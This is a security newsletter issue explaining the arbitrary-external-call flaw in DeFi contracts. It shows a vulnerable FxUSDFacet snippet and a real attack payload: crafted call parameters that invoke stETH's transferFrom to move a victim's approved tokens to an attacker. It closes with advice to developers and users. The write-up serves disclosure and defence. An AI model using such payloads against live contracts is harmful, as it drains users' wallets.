Greetings!

A well known exploitation pattern has been picking up lately which takes advantage of the arbitrary external call vulnerability. Unlike other smart contract exploits, this one targets protocol’s users who approved their tokens to the contract. Seneca ($6.5M) and Fx Protocol ($5K) were compromised this week using the exploit. Similar compromises happened this year such as Socket ($3.3M), Basket DAO ($107K), and others. Let’s take a look at a sample vulnerable code in the FxUSDFacet contract:

function transferInAndConvert(ConvertInParams memory params, address tokenOut) internal returns (uint256 amountOut) {
[.. snip ..]

if (params.src == address(0)) {
(_success, ) = params.target.call{ value: params.amount }(params.data); // Arbitrary External Call

[.. snip ..]

In the snippet above, the contract can make arbitrary calls to the contract address using parameters specified by the user. Consider the following parameters used in a recent exploit that specify the target contract 0xae7ab9..d7fe84 (stETH):

{

"params": {
"src": "0x0000000000000000000000000000000000000000",
"amount": "0",
"target": "0xae7ab96520de3a18e5e111b5eaab095312d7fe84",
"data": "0x23b872dd000000000000000000000000eb16a13b91579125c9bf5eaf8215f647d7b9778c0000000000000000000000003aa228a80f50763045bdfc45012da124bd0a68090000000000000000000000000000000000000000000000001f8bb663d0c2a9f2",
"minOut": "0"
},
"tokenOut": "0xac3e018457b222d93114458476f3e3416abbe38f"
}

This specially crafted payload will execute transferFrom (0x23b872dd) method on the stETH (0xae7ab9…d7fe84) contract to transfer 2.273 stETH from the victim (0xeb16a1…) to the attacker (0x3aa228…). The only precondition is that the victim approved stETH which the vulnerable contract will now spend. Attackers tend to mass exploit such approvals to drain multiple user wallets with approvals to the exploited contract causing a literal feast for multiple bad actors joining the hack in progress.

PSA for Developers: Avoid arbitrary calls where some or all of the parameters are unfiltered and controlled by callees.

Atlantis Loans compromise from June, 2023 continues draining user accounts almost a year (!!!) after the initial governance hack. However, the bad actors have just stolen $650K worth of wrapped BTC to claim their largest loot yet.

PSA for Users: Proactively revoke approvals from not only compromised, but also abandoned projects which may be used to steal your assets in the future.

The premium section this week contains vulnerability, exploit details, and indicators from 7 compromises netting $15M+ from projects mentioned above as well as Serenity Shield, Smoofs, Shido, and others.

To gain access to comprehensive vulnerability write-ups, post-mortems, exploit proof of concepts (PoCs), attacker addresses, and additional data regarding this week’s compromises, please subscribe to the premium plan below.

Let’s dive into the news!